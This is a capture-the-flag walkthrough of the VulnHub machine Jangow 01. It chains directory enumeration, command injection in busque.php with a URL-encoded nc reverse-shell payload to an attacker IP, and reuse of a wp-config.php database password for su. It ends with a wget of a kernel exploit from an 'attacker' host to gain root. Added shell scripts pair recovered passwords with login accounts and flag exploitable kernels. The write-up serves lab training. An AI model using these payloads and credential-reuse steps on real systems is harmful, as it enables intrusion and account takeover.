CTF WRITEUP VULNHUB BLACK BOX EASY

Jangow 01 — VulnHub Easy

Written By: Th0mas_sh316y
Difficulty: Easy
Platform: VulnHub
Target IP: 192.168.1.10

Jangow 01 Machine
Machine: Jangow 01 · Easy · Linux · VulnHub

Jangow 01 is a clean intro box that hinges on one finding: a search-page parameter (buscar, in /site/busque.php) that is passed straight to the shell, giving command execution as www-data. The privesc is a public kernel exploit, because the box ships with a deliberately old Ubuntu kernel (4.4.0-31). Total time was around 45 minutes. Honestly the trickiest part was finding busque.php in the directory listing; it's not in standard wordlists.

01_Reconnaissance

nmap shows two services: FTP on 21 (vsftpd, anonymous login disabled) and HTTP on 80 (Apache 2.4.18). The site is in Spanish and mostly static pages, so run dirb against /site/ to map the file tree; it turns up the wordpress/ directory and the search endpoint busque.php.

terminal / dirb
$ nmap -sV -p- 192.168.1.10
21/tcp open  ftp     vsftpd
80/tcp open  http    Apache 2.4.18

$ dirb http://192.168.1.10/site/
==> DIRECTORY: /site/wordpress/
+ /site/busque.php (200 OK) — search endpoint

02_busque.php_Command_Injection

busque.php takes a buscar parameter and passes it, unsanitized, to a shell. Appending ;id terminates whatever command the page runs on the parameter and executes id as the web server user; its output comes back in the response body. That is a classic command-injection sink, so upgrade it to a reverse shell. Two practical notes: percent-encode the payload (a bare & or # would end the query string before PHP ever sees the rest of the command), and nc -e only works where the target's nc build supports it; if it does not, a bash /dev/tcp one-liner does the same job.

terminal / cmd injection
# Confirm injection
$ curl "http://192.168.1.10/site/busque.php?buscar=;id"
uid=33(www-data) gid=33(www-data)

# Reverse shell payload (URL-encoded)
$ curl "http://192.168.1.10/site/busque.php?buscar=;nc%20-e%20/bin/bash%20192.168.1.100%204444"

# Listener
$ nc -lvnp 4444
www-data@jangow01:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'

03_Credential_Recovery_from_wp-config.php

The WordPress install under /site/ lives on the same box, and its wp-config.php holds the MySQL credentials in clear text, as every wp-config.php does. Here DB_USER is jangow01, which is also a local account, and the DB password is reused for it: su jangow01 with that password swaps the www-data pty for a proper login shell as a real user. Whenever you pull a password out of a config file, try it against every local account with a shell, not just the one it was stored for.

terminal / wp-config.php
$ grep DB_ /var/www/html/site/wordpress/wp-config.php
define('DB_USER', 'jangow01');
define('DB_PASSWORD', '[REDACTED]');

$ su jangow01
Password: [REDACTED]
jangow01@jangow01:~$ id
uid=1000(jangow01) gid=1000(jangow01)
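An added example for the credential-reuse step, not from the original writeup: a few POSIX sh functions that pull define() values out of a wp-config.php, list the local accounts that can log in, and pair them with the DB password as su candidates. The wp-config.php and passwd snippets it works on are constructed samples with a placeholder password, not the box's real files.

```shell
#!/bin/sh
# Added example, not from the writeup: recover DB credentials from a
# wp-config.php and line them up against local login accounts for su.

# Value of define('KEY', 'value') in a wp-config.php (quotes may be ' or ",
# spacing is free; values that themselves contain quotes are out of scope).
wp_define() {  # usage: wp_define FILE KEY
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" "$1" | head -n 1
}

# Accounts that can actually log in: uid >= 1000 (not nobody) with a real shell.
login_users() {  # usage: login_users PASSWD_FILE
    awk -F: '$3 >= 1000 && $3 != 65534 && $7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# "user:password" candidates for su, DB_USER first when it is also a local
# account (the exact reuse this box relies on), then every other login user.
# (awk -v applies escape processing, so a password with backslashes would
# need a different hand-off.)
reuse_candidates() {  # usage: reuse_candidates WP_CONFIG PASSWD_FILE
    db_user=$(wp_define "$1" DB_USER)
    db_pass=$(wp_define "$1" DB_PASSWORD)
    login_users "$2" | awk -v u="$db_user" -v p="$db_pass" '
        $1 == u { first = $1 ":" p; next }
        { rest = rest $1 ":" p "\n" }
        END { if (first != "") print first; printf "%s", rest }'
}

# Constructed samples (placeholder password, not the box's real one).
SAMPLES=$(mktemp -d)
trap 'rm -rf "$SAMPLES"' EXIT
cat > "$SAMPLES/wp-config.php" <<'EOF'
<?php
define( 'DB_NAME', 'wordpress' );
define('DB_USER', 'jangow01');
define('DB_PASSWORD', 'hunter2');
define('DB_HOST', 'localhost');
EOF
cat > "$SAMPLES/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
dev:x:1001:1001::/home/dev:/bin/sh
jangow01:x:1000:1000:jangow01,,,:/home/jangow01:/bin/bash
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
EOF

# On the target this would be:
#   reuse_candidates /var/www/html/site/wordpress/wp-config.php /etc/passwd
reuse_candidates "$SAMPLES/wp-config.php" "$SAMPLES/passwd"
```

Each line it prints is one su attempt; the DB user comes first because that is the most likely reuse, but the other login users are worth the few seconds each.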

04_PrivEsc_via_Kernel_Exploit

Kernel is 4.4.0-31-generic (#50-Ubuntu), a stock Ubuntu 16.04 kernel from mid-2016 that predates the fixes for several public local privilege escalation bugs, Dirty COW (CVE-2016-5195) among them. The PoC fetched below, 45010.c, is Exploit-DB 45010, the CVE-2017-16995 eBPF verifier exploit for Ubuntu 16.04 kernels of this vintage, not an overlayfs exploit. Compiled it in /tmp, ran it, and got root in seconds. Check that gcc is present on the target before relying on this; it is here, otherwise compile on a matching box and copy the binary over.

terminal / kernel exploit
jangow01@jangow01:~$ uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu

jangow01@jangow01:/tmp$ wget http://attacker/45010.c
jangow01@jangow01:/tmp$ gcc 45010.c -o exploit
jangow01@jangow01:/tmp$ ./exploit

# id
uid=0(root) gid=0(root)
# cat /root/proof.txt
[REDACTED]
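Added example, not the writeup's own: before fetching a PoC, compare the running kernel against the distro's first fixed build numerically, ABI number included, because a plain string compare gets 4.4.0-9 versus 4.4.0-31 backwards. The only row in the table is Dirty COW, whose Ubuntu 16.04 fix (USN-3106-1) is kernel 4.4.0-45; the exploit actually run on this page, 45010.c (CVE-2017-16995), needs its own row taken from the corresponding advisory. Function names and the table format are mine.

```shell
#!/bin/sh
# Added example, not from the writeup: decide whether the running kernel
# predates a distro fix by comparing version fields numerically.

# "4.4.0-31-generic" -> "4 4 0 31" (major minor patch ABI); missing fields
# become 0 and the flavour suffix is dropped.
kver_parts() {
    _v=$(printf '%s' "$1" | sed 's/[^0-9.-].*$//; s/[.-]/ /g')
    set -- $_v
    printf '%s %s %s %s\n' "${1:-0}" "${2:-0}" "${3:-0}" "${4:-0}"
}

# True when kernel A is older than kernel B. Field-by-field numeric compare,
# so 4.4.0-9 < 4.4.0-31 (a string compare would say the opposite).
kver_lt() {  # usage: kver_lt A B
    printf '%s\n%s\n' "$(kver_parts "$1")" "$(kver_parts "$2")" | awk '
        NR == 1 { for (i = 1; i <= 4; i++) a[i] = $i + 0; next }
        {
            for (i = 1; i <= 4; i++) {
                if (a[i] < $i + 0) exit 0
                if (a[i] > $i + 0) exit 1
            }
            exit 1
        }'
}

# Rows: "label|first fixed kernel|Exploit-DB ids". Only Dirty COW is filled
# in (Ubuntu 16.04 fix per USN-3106-1: 4.4.0-45); add rows from your distro's
# advisories, including the one for the PoC you intend to run.
KNOWN_BAD='CVE-2016-5195 Dirty COW|4.4.0-45|40839 40847'

# Print every row whose fix the given kernel predates.
triage() {  # usage: triage "$(uname -r)"
    printf '%s\n' "$KNOWN_BAD" | while IFS='|' read -r label fixed ids; do
        if kver_lt "$1" "$fixed"; then
            printf '%s: %s predates fix %s -> try EDB %s\n' "$label" "$1" "$fixed" "$ids"
        fi
    done
}

triage "4.4.0-31-generic"   # the kernel found on this box
```

On the target, `triage "$(uname -r)"` replaces the hard-coded string; a kernel at or past the fixed ABI prints nothing for that row.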

05_Attack_Chain_Summary

  1. nmap → FTP 21 + HTTP 80 → dirb /site/ → busque.php
  2. busque.php?buscar=;id → command injection as www-data
  3. nc reverse shell → upgrade with python3 pty
  4. wp-config.php → DB password reused for user jangow01 → su
  5. Kernel 4.4.0-31 → Exploit-DB 45010 local privesc → root